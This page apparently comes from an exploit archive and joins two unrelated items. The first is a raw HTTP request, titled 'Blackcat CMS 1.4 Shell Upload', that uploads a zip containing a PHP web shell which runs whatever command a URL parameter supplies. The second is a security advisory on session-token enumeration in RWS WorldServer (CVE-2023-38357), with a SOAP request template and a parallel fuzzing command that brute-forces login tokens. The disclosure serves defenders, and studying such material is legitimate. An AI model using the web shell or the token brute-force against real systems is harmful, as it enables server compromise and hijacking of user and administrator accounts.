""Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryBRByJwW3CUSHOcBTUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/BlackCatCMS-1.4/upload/backend/admintools/tool.php?tool=jquery_plugin_mgrAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: cat7288sessionid=7uv7f4kj7hm9q6jnd6m9luq0tiConnection: close------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="upload"1------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="userfile"; filename="poc.zip"Content-Type: application/zipPKvalsdalsfapoc.php<?php $a=$_GET['code']; echo system($a);?>blabalaboalpoc.phpblablabla------WebKitFormBoundaryBRByJwW3CUSHOcBTContent-Disposition: form-data; name="submit"Upload------WebKitFormBoundaryBRByJwW3CUSHOcBT--

Blackcat CMS 1.4 Shell Upload

RWS WorldServer versions 11.7.3 and below suffer from a session token enumeration vulnerability.

Advisory: Session Token Enumeration in RWS WorldServer

Session tokens in RWS WorldServer have a low entropy and can be  
enumerated, leading to unauthorised access to user sessions.

Details  
=======

Product: WorldServer  
Affected Versions: 11.7.3 and earlier versions  
Fixed Version: 11.8.0  
Vulnerability Type: Session Token Enumeration  
Security Risk: high  
Vendor URL: https://www.rws.com/localization/products/additional-solutions/  
Vendor Status: fixed version released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-001  
Advisory Status: published  
CVE: CVE-2023-38357  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38357

Introduction  
============

"WorldServer offers a flexible, enterprise-class translation management  
system that automates translation tasks and greatly reduces the cost of  
supporting large volumes of local language content."

(from the vendor's homepage)

More Details  
============

WorldServer associates user sessions with numerical tokens, which always  
are positive values below 2^31. The SOAP action "loginWithToken" allows  
for a high amount of parallel attempts to check if a token is valid.  
During analysis, many assigned tokens were found to be in the 7-digit  
range of values. An attacker is therefore able to enumerate user  
accounts in only a few hours.

Proof of Concept  
================

In the following an example "loginWithToken" request is shown:

-----------------------------------------------------------------------  
POST /ws/services/WSContext HTTP/1.1  
Content-Type: text/xml;charset=UTF-8  
SOAPAction: ""  
Content-Length: 501  
Host: www.example.com  
Connection: close  
User-Agent: agent

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"   
xmlns:soapenv="http://schemas.xmlsoap.org">  
    <soapenv:Header/>  
    <soapenv:Body>  
       <com:loginWithToken soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">  
          <token xsi:type="xsd:string">FUZZ</token>  
       </com:loginWithToken>  
    </soapenv:Body>  
</soapenv:Envelope>  
-----------------------------------------------------------------------

It can be saved as file "login-soap.req" and be used as a request  
template for the command-line HTTP enumerator monsoon [1] to achieve  
many parallel requests:

-----------------------------------------------------------------------  
$ monsoon fuzz --threads 100 \  
--template-file login-soap.req \  
--range 1-2147483647 \  
--hide-pattern "InvalidSessionException" \  
'https://www.example.com'

Target URL: https://www.example.com/

  status   header     body   value    extract

     500      191      560   5829099  
     500      191      556   6229259  
     200      191     3702   7545136  
     500      191      556   9054984  
[...]  
processed 12000000 HTTP requests in 2h38m38s  
4 of 12000000 requests shown, 1225 req/s  
-----------------------------------------------------------------------

The --range parameter reflects the possible value range of 2^31 and for  
each value an HTTP request is sent to the WorldServer SOAP API where the  
FUZZ marker in the request template is replaced with the respective  
value. Also responses are hidden which contain "InvalidSessionException"  
as these sessions are invalid. Responses will yield a status code of 200  
if an administrative session token is found. For an unprivileged user  
session, status code 500 is returned.

Workaround  
==========

Lower the rate at which requests can be issued, for example with a  
frontend proxy.

Fix  
===

According to the vendor, upgrading to versions above 11.8.0 resolves the  
vulnerability.

Security Risk  
=============

Attackers can efficiently enumerate session tokens. In a penetration  
test, it was possible to get access to multiple user accounts, including  
administrative accounts using this method in under three hours.  
Additionally, by using such an administrative account it seems likely to  
be possible to execute arbitrary code on the underlying server by  
customising the REST API [2]. Thus, the vulnerability poses a high risk.

Timeline  
========

2023-03-27 Vulnerability identified  
2023-03-30 Customer approved disclosure to vendor  
2023-04-03 Requested security contact from vendor  
2023-04-06 Vendor responded with security contact  
2023-04-14 Advisory sent to vendor  
2023-04-18 Vendor confirms vulnerability and states that it was already  
known and fixed in version 11.8.0.  
2023-07-03 Customer confirms update to fixed version  
2023-07-05 CVE ID requested  
2023-07-15 CVE ID assigned  
2023-07-19 Advisory released

References  
==========

[1] https://github.com/RedTeamPentesting/monsoon  
[2] https://docs.rws.com/860026/585715/worldserver-11-7-developer-documentation/customizing-the-rest-api

RedTeam Pentesting GmbH  
=======================

RedTeam Pentesting offers individual penetration tests performed by a  
team of specialised IT-security experts. Hereby, security weaknesses in  
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to  
share its knowledge and enhance the public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.

More information about RedTeam Pentesting can be found at:  
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting  
=============================

RedTeam Pentesting is looking for penetration testers to join our team  
in Aachen, Germany. If you are interested please visit:  
https://jobs.redteam-pentesting.de/

--   
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0  
Alter Posthof 1                           Fax : +49 241 510081-99  
52062 Aachen                    https://www.redteam-pentesting.de  
Germany                         Registergericht: Aachen HRB 14004  
Geschäftsführer:                       Patrick Hof, Jens Liebchen

Source

Packet Storm